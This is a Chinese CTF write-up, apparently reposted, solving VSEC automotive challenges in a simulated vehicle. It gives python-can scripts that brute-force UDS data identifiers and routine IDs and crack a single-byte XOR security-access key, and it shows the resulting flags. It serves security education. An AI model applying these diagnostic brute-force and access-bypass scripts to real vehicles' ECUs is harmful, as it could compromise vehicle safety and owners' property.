首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

【WriteUP】VSEC 车联网安全 CTF 挑战赛(三)

文摘   2024-08-02 18:09   上海  

Block Harbor 是一家专注于汽车网络安全领域的公司,Block Harbor 组织的汽车CTF挑战赛,第一季以教育和乐趣为核心,教授参与者如何嗅探CAN总线并发送控制信息。赛事迅速获得了社区的积极响应,并发展成为一个全球性的活动,吸引了来自亚洲、中东、欧洲和北美的900多名参与者。

  • 第一季赛事结束后,Block Harbor 通过其平台VSEC公开了50个独特的汽车挑战,并提供了5000美元的奖金,激发了更广泛的参与和社区建设。

  • 第二季赛事预计将在2024年8月24日至9月8日举行,奖金池增至10万美元(From Garage to Glory: The Rise of a $100K Automotive Capture the Flag Challenge – Block Harbor

继第一部分WriteUP发出后,收到很多师傅关注,也有很多师傅动手做了起来

欢迎大家与我们交流,继续第三弹

再次感谢yichen投稿,yichen yyds



VSEC Garage: User Space Diagnostics

User Space Diagnostics 的系列题目需要用到另一个终端


Read Data By Identifier

题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.Can you identify the data?翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。您能识别数据吗?

打开里面 candump 也没东西,有点不知所措了🤦,发了个 7DF 的也没人(ECU)回复‍,试着给 7E0 发了个请求倒是回复了个 NRC,表示这个 ID 不支持,再根据题目意思,看样子是想让我爆破一下?搓个脚本试试

import canimport timeimport binascii
bus =  can.Bus(interface='socketcan', channel='vcan0')
for i in range(0,0xFF):    for j in range(0,0xFF):        message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x03, 0x22, i, j, 0x00, 0x00, 0x00, 0x00])        bus.send(message, timeout=0.2)        msg = bus.recv()
bus.shutdown()

当发到 0008 的时候就正常读取到了信息,算出题人有良心,记一颗红豆

那么接下来发个流控,读完它

cansend vcan0 7E0#03220008cansend vcan0 7E0#3000000000000000

把数据解析一下得到:bh{identified_by_what???}


Routine Control

题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I hear routine control has a lot of fun features.翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我听说常规控制有很多有趣的功能。

使用 Routine Control 服务来执行已定义的步骤序列并获取任何相关结果,服务 ID 是 0x31子功能也比较简单,开始(01)、停止(02)、获取结果(03)那先试试开始执行吧,简单试了试都是否定响应,估计也得爆破

写个脚本跑去吧

import canimport timeimport binascii
bus =  can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
for i in range(0,0xFF):    for j in range(0,0xFF):        time.sleep(0.01)        message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x04, 0x31, 0x01, i, j, 0x00, 0x00, 0x00])        bus.send(message, timeout=0.2)        msg = bus.recv()        result = binascii.hexlify(msg.data).decode('utf-8')        if result == "037f3131":            pass        else:            print("i: ",hex(i),"   j: ",hex(j))
bus.shutdown()

跑了一段时间发现 1337 是响应的,因此先执行 1337 然后再获取结果,得到:bh{c0ntroll1ng_th3_r0ut1nes}



Security Access Level 1

题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I hear single byte XOR keys are a great security measure, can you prove me wrong?翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我听说单字节 XOR 密钥是一种很好的安全措施,你能证明我错了吗?

安全访问 level1 单字节的异或密钥,那直接上脚本爆破吧


import canimport timeimport binascii
bus =  can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])for key in range(0,0xFF):    message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])    bus.send(message, timeout=0.2)    msg = bus.recv()    time.sleep(1)    message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])    bus.send(message, timeout=0.2)    msg = bus.recv()
    result = binascii.hexlify(msg.data).decode('utf-8')    seed = result[6:14]    key1 = int(seed[:2],16) ^ key    key2 = int(seed[2:4],16) ^ key    key3 = int(seed[4:6],16) ^ key    key4 = int(seed[6:8],16) ^ key
    message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])    bus.send(message, timeout=0.2)    msg = bus.recv()    result = binascii.hexlify(msg.data).decode('utf-8')    if result == "037f2735":        pass    else:        print("key: ",hex(key))
bus.shutdown()

直到爆破到 0x20 的时候才成功,再发个流控得到 flag

因此:bh{whats_wrong_with_static_keys?}

import canimport timeimport binascii
bus =  can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')seed = result[6:14]key1 = int(seed[:2],16) ^ 0x20key2 = int(seed[2:4],16) ^ 0x20key3 = int(seed[4:6],16) ^ 0x20key4 = int(seed[6:8],16) ^ 0x20message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')print(result)message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)bus.shutdown()


Read Memory By Address

题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I wonder whats at 0xc0ffe000?翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我想知道 0xc0ffe000 是什么?

就是读内存呗,上脚本


 http://mp.weixin.qq.com/s?__biz=Mzk0MzQzNzMxOA==&mid=2247487217&idx=1&sn=a16069d09b21990fffd2e8fd31b2984c
安全脉脉
我们致力于提高车联网安全的意识,推动行业发展,保护车辆和驾驶者免受潜在威胁的影响。在这里可以与车联网安全领域的专家和爱好者分享知识、深入思考、探讨标准法规、共享工具和讨论车联网热点事件。
 最新文章
VW IVI RCE AS ROOT
Autel MaxiCharger(CVE-2024-23967 /CVE-2024-23957解析)
*想疑存在野漏洞利用
Autel Maxicharger 充电桩RCE
双11帮会优惠价格限时抢购
SDC2024 议题回顾 | 智能摩托车进化之路
春风动力 CFMOTO 可能在美国被禁
2025 Pwn2Own Automotive
IoT安全揭秘:电压注入与密钥窃取的黑暗之路
TESLA TPMS-RCE(0-click)
如何模糊测试SOME/IP协议 (二)如何进入宝马名人堂
如何模糊测试SOME/IP协议 (一)
远控起亚分析
开箱PowerShorter:给国内安全爱好者的故障注入设备
【内推】车联网安全招聘看这里!!
JuiceBox 40充电桩探究
破解ChargePoint充电桩
使用Universal Radio Hacker分析的无线电信号
车联网安全招聘看这里!!
因R155法规而停产的汽车型号列表
某新能源车企 | 车联网安全面经分享
文末优惠 | 抽3人送《黑神话:悟空》豪华版!
自行车都有漏洞了?车联网还是太全面了
近期车企数据安全事件(通用汽车、东风汽车)
blackhat USA 2024部分议题
车企TSP平台漏洞挖掘
【WriteUP】VSEC 车联网安全 CTF 挑战赛(三)
探索Tesla 隐藏的安全漏洞 —— Toolbox
(更新)车企SRC汇总
故障注入Renesas RH850/F1L
撬开芯片的大门:故障注入实战培训
【WriteUP】VSEC 车联网安全 CTF 挑战赛(二)
在STM32F4微控制器上进行电压故障注入
【WriteUP】VSEC 车联网安全 CTF 挑战赛(一)
特斯拉上价值 10000 美元的 XSS 漏洞
为电磁故障注入(EMFI)去除芯片封装
解读 |《2024年汽车标准化工作要点》--汽车网络与数据安全
全美约1.5万家汽车经销商因网络攻击暂停服务
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉